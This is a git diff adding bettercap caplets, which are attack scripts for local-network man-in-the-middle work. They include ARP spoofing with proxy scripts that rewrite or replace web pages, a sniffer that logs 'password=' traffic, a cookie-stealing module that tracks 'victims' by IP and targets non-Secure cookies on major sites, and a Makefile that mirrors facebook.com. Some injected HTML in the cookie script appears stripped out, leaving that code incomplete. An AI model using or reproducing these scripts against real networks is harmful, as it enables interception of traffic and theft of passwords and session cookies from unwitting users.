a/rtfm/rtfm.cap b/rtfm/rtfm.cap new file mode 100644 index 0000000..e5a6ab8 --- /dev/null +++ b/rtfm/rtfm.cap @@ -0,0 +1,8 @@ +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap -caplet rtfm.cap -eval "set arp.spoof.targets 192.168.1.64" + +clear +set http.proxy.script rtfm.js +http.proxy on +arp.spoof on diff --git a/rtfm/rtfm.js b/rtfm/rtfm.js new file mode 100644 index 0000000..6a6c582 --- /dev/null +++ b/rtfm/rtfm.js @@ -0,0 +1,24 @@ +function onRequest(req, res) { + req.Path = req.Path.replace('-you-did-not-rtfm', ''); +} + +function onResponse(req, res) { + if (res.ContentType.indexOf("text/html") == 0) { + var body = res.ReadBody(); + res.Body = body.replace( + /\.(jpg|jpeg|png|gif|bmp)/gi, + '-you-did-not-rtfm.$1' + ); + } + else if (res.ContentType.indexOf("image/jpeg") != -1) { + headers = res.Headers.split("\r\n"); + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + res.RemoveHeader(header_name); + } + res.SetHeader("Connection", "close"); + res.Status = 200; + res.Body = readFile("/usr/local/share/bettercap/caplets/www/rtfm_cat.jpg"); + log("RTFM! " + req.Hostname + req.Path + ( req.Query ? "?" + req.Query : '')); + } +} diff --git a/simple-passwords-sniffer.cap b/simple-passwords-sniffer.cap new file mode 100644 index 0000000..3a207f5 --- /dev/null +++ b/simple-passwords-sniffer.cap @@ -0,0 +1,10 @@ +set net.sniff.regexp .*password=.+ +set net.sniff.output passwords.cap + +# start arp spoofing attack +# arp.spoof on +net.sniff on + + + + diff --git a/steal-cookies/README.md b/steal-cookies/README.md new file mode 100644 index 0000000..193d08d --- /dev/null +++ b/steal-cookies/README.md @@ -0,0 +1,4 @@ +# Steal cookies + +Enumerate each domain from file and steal all cookies without `Secure` flag. + diff --git a/steal-cookies/domains.txt b/steal-cookies/domains.txt new file mode 100644 index 0000000..51c5c95 --- /dev/null +++ b/steal-cookies/domains.txt @@ -0,0 +1,10 @@ +google.com +youtube.com +facebook.com +baidu.com +wikipedia.org +reddit.com +yahoo.com +google.co.in +qq.com +amazon.com \ No newline at end of file diff --git a/steal-cookies/steal-cookies.cap b/steal-cookies/steal-cookies.cap new file mode 100644 index 0000000..e9513cf --- /dev/null +++ b/steal-cookies/steal-cookies.cap @@ -0,0 +1,3 @@ +set steal-cookies.domains /usr/share/bettercap/caplets/steal-cookies/domains.txt +set http.proxy.script steal-cookies.js +http.proxy on diff --git a/steal-cookies/steal-cookies.js b/steal-cookies/steal-cookies.js new file mode 100644 index 0000000..6e358e5 --- /dev/null +++ b/steal-cookies/steal-cookies.js @@ -0,0 +1,104 @@ +var victims = {} + +function Rf(s) +{ + return "\033[31m" + s + "\033[0m" +} +function Rb(s) +{ + return "\033[41m" + s + "\033[0m" +} + +function onLoad() +{ + log( "Cookies steal module loaded." ); + log( "targets: " + env['arp.spoof.targets'] ); +} + +function onRequest(req, res) +{ + var ip = req.Client.IP, + hostname = req.Hostname, + headers, cookies + + headers = req.Headers.replace(/\r\n$/g, "").split("\r\n") + for (var i = 0; i < headers.length; i++) + { + header_name = headers[i].replace(/:.*/, "") + if(header_name == 'Cookie') + cookies = headers[i].replace(/.*?: /, ""); + } + + if( req.Query.indexOf('__steal') != -1 ) + { + if(cookies) + log( Rb( "[+] " + ip + " - " + hostname + " " + cookies ) ) + + if( victims[ip] && victims[ip].length ) + { + var hostname_index = victims[ip].indexOf(hostname) + if( hostname_index != -1 ) + victims[ip].splice( hostname_index, 1 ) + + if( victims[ip].length ) + res.Body = '\n' + + '

\n' + + '\n' + + '\n' + + '' + else + res.Body = 'end stealing' + res.Status = 200 + res.ContentType = "text/html" + res.Headers = "Connection: close" + } + } +} + +function onResponse(req, res) +{ + if( res.ContentType.indexOf('text/html') == 0 ) + { + var body = res.ReadBody(), + ip = req.Client.IP + + if(! victims[ip] ) + { + victims[ip] = readFile(env["steal-cookies.domains"]).toString().split('\n') + body = body.replace( + '', + '' + ) + body = body.replace( + '', + '' + ) + + log( Rf( "[*] new victim: " + ip + " - " + victims[ip][0] ) ) + + res.Body = body + res.Status = 200 + res.ContentType = "text/html" + res.Headers = "Connection: close" + } + else if( victims[ip].length && req.Query.indexOf('__steal') == -1 ) + { + body = body.replace( + '', + '' + ) + body = body.replace( + '', + '' + ) + + log( Rf( "[*] continue stealing: " + ip + " - " + victims[ip][0] ) ) + + res.Body = body + res.Status = 200 + res.ContentType = "text/html" + res.Headers = "Connection: close" + } + } +} diff --git a/tcp-req-dump/tcp-req-dump.cap b/tcp-req-dump/tcp-req-dump.cap new file mode 100644 index 0000000..4f51646 --- /dev/null +++ b/tcp-req-dump/tcp-req-dump.cap @@ -0,0 +1,19 @@ +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap -caplet tcp-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64" + +# to make it less verbose +# events.stream off + +# we'll use this proxy script to dump requests +set tcp.proxy.script tcp-req-dump.js +set tcp.port 80 +# example.com +set tcp.address 93.184.216.34 +set tcp.proxy.port 8080 + +clear + +# go ^_^ +tcp.proxy on +arp.spoof on diff --git a/tcp-req-dump/tcp-req-dump.js b/tcp-req-dump/tcp-req-dump.js new file mode 100644 index 0000000..da95cfa --- /dev/null +++ b/tcp-req-dump/tcp-req-dump.js @@ -0,0 +1,13 @@ +function onLoad() { + log("TCP module loaded") +} + +function onData(from, to, data) { + if( data.indexOf("Accept-Encoding: gzip, deflate") != -1 ) { + log("Disabling gzip response"); + data = data.replace("Accept-Encoding: gzip, deflate", "Accept-Encoding: text/plain"); + return data; + } + + return data.replace(/Example/g, "POPOPOP"); +} diff --git a/web-override/web-override.cap b/web-override/web-override.cap new file mode 100644 index 0000000..132ca56 --- /dev/null +++ b/web-override/web-override.cap @@ -0,0 +1,15 @@ +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap -caplet web-override.cap -eval "set arp.spoof.targets 192.168.1.64" + +set http.proxy.script web-override.js +http.proxy on +https.proxy on +arp.spoof on +events.clear + + + + + + diff --git a/web-override/web-override.js b/web-override/web-override.js new file mode 100644 index 0000000..fbc9771 --- /dev/null +++ b/web-override/web-override.js @@ -0,0 +1,13 @@ +// Called before every request is executed, just override the response with +// our own html web page. +function onRequest(req, res) { + headers = res.Headers.split("\r\n"); + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + res.RemoveHeader(header_name); + } + res.SetHeader("Connection", "close"); + res.Status = 200; + res.ContentType = "text/html"; + res.Body = readFile("/usr/local/share/bettercap/caplets/www/index.html"); +} diff --git a/www/.gitignore b/www/.gitignore new file mode 100644 index 0000000..27bad81 --- /dev/null +++ b/www/.gitignore @@ -0,0 +1 @@ +www.facebook.com diff --git a/www/Makefile b/www/Makefile new file mode 100644 index 0000000..0322bf7 --- /dev/null +++ b/www/Makefile @@ -0,0 +1,9 @@ +all: facebook + +facebook: + wget -U "Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" -S -r www.facebook.com + find www.facebook.com -name "*.html" -print0 | xargs -0 sed -i "s/https:\/\/www.facebook.com//g" + +clean: + rm -rf www.facebook.com + diff --git a/www/index.html b/www/index.html new file mode 100644 index 0000000..7dccb06 --- /dev/null +++ b/www/index.html @@ -0,0 +1,17 @@ + + + + + You've just been RickRoll'd + + + + + + + + + + diff --git a/www/rtfm_cat.jpg b/www/rtfm_cat.jpg new file mode 100644 index 0000000..90487e3 Binary files /dev/null and b/www/rtfm_cat.jpg differ